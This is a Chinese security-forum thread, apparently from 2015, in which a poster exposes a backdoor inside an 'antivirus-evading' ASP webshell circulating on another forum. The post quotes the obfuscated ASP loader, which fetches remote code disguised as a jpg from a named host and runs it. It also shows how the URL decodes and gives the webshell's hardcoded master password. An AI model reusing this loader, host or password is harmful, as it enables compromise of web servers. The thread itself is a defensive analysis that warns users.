查看: 30845|回复: 130

在我们论坛放后门?呵呵

[复制链接]
  • TA的每日心情
    郁闷
    2016-3-22 14:15
  • 签到天数: 95 天

    [LV.6]常住居民II

    发表于 2015-4-29 19:31:15 | 显示全部楼层 |阅读模式

    刚刚逛论坛 ,一不小心发现 一个nb的帖子  。 看名字挺唬人的  ,最新过狗asp木马,整体大小仅2KB,免杀全球。

    暗自思衬  十有八九是包含。既然只有2K ,绝笔是包含在人家服务器上的。这特么没后门 我直播剁手。


    居然在大08放后门     吓尿 ,下载下来看看。 过狗asp木马 _大小2KB_免杀全球.zip (945 Bytes, 下载次数: 16)


    [AppleScript] 纯文本查看 复制代码
    aspCode=PostHTTPPage(Chr ( 104 ) & Chr ( 116 ) & Chr ( 116 ) & Chr ( 112 ) & Chr ( 58 ) & Chr ( 47 ) & Chr ( 47 ) & Chr ( 119 ) & Chr ( 119 ) & Chr ( 119 ) & Chr ( 46 ) & Chr ( 55 ) & Chr ( 106 ) & Chr ( 121 ) & Chr ( 101 ) & Chr ( 119 ) & Chr ( 117 ) & Chr ( 46 ) & Chr ( 99 ) & Chr ( 110 ) & Chr ( 47 ) & Chr ( 105 ) & Chr ( 109 ) & Chr ( 103 ) & Chr ( 47 ) & Chr ( 49 ) & Chr ( 46 ) & Chr ( 106 ) & Chr ( 112 ) & Chr ( 103 ))
    Session("aspCode") =aspCode
    End if
    execute aspCode


    显然这就是  包含的内容

    [PHP] 纯文本查看 复制代码
    <?php
    $a=chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(119).chr(119).chr(119).chr(46).chr(55).chr(106).chr(121).chr(101).chr(119).chr(117).chr(46).chr(99).chr(110).chr(47).chr(105).chr(109).chr(103).chr(47).chr(49).chr(46).chr(106).chr(112).chr(103 );
    echo $a;
    ?>


    我们echo一下 他是什么鬼

    1.png

    我们打开 http://www.7jyewu.cn/img/1.jpg

    图片不显示,不显示就对了。显示才出了鬼。他是个asp的大马

    2.png

    嗯 没错 这就是那个sb后门

    按照尿性 必有万能密码

    [AppleScript] 纯文本查看 复制代码
    if session("KKK")<>UserPass then
    if request.form("pass")<>"" then
    if request.form("pass")=UserPass or request.form("pass")="1a2s3d" then
    session("KKK")=UserPass



    不错这个马用1a2s3d 也能登进去

    不说了  管理删帖去把。

    点评

    http://www.ihonker.org/thread-3904-1-1.html 这个帖子,也是这个站的  发表于 2015-4-30 10:19

    评分

    参与人数 6i币 +54 贡献 +2 收起 理由
    丨丶钟情 + 6 支持原创
    clocks + 4 支持原创!分析的很透彻啊
    H.U.C-Star + 6 支持原创,想学抓包看后门,就不至于抓瞎了.
    w10086 + 2 膜拜大神~
    C4r1st + 16 http://www.ihonker.org/thread-3904-1-1.h
    管理01 + 20 + 2 支持原创

    查看全部评分

    回复

    使用道具 举报

  • TA的每日心情
    无聊
    2021-1-25 21:16
  • 签到天数: 419 天

    [LV.9]以坛为家II

    发表于 2015-4-29 21:04:50 | 显示全部楼层
    0.0  好带进  还08 08 08....醉了
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2019-10-8 10:12
  • 签到天数: 15 天

    [LV.4]偶尔看看III

    发表于 2015-4-29 21:44:02 | 显示全部楼层
    被爆菊了
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2023-3-28 21:40
  • 签到天数: 215 天

    [LV.7]常住居民III

    发表于 2015-4-30 09:33:19 | 显示全部楼层
    很牛掰的样子
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2019-8-2 09:32
  • 签到天数: 227 天

    [LV.7]常住居民III

    发表于 2015-4-30 14:22:46 | 显示全部楼层
    很经典,好像学习怎么判断后门,ip雷达看哪里就知道有无后门?
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2020-5-26 00:47
  • 签到天数: 215 天

    [LV.7]常住居民III

    发表于 2015-5-1 20:10:05 | 显示全部楼层
    = =。我居然发现我下载了,表示自己从没拿来用。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2016-4-27 19:03
  • 签到天数: 192 天

    [LV.7]常住居民III

    发表于 2015-5-3 03:04:27 | 显示全部楼层
    支持原创
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2017-8-21 09:22
  • 签到天数: 181 天

    [LV.7]常住居民III

    发表于 2015-5-6 10:56:22 | 显示全部楼层
    分析的很给力啊
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2016-7-18 11:00
  • 签到天数: 154 天

    [LV.7]常住居民III

    发表于 2015-5-7 06:12:38 | 显示全部楼层
    晕死了,玩闹 呢吧
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-5-10 22:09:08 | 显示全部楼层
    膜拜大神
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-1 21:35 , Processed in 0.049541 second(s), 17 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部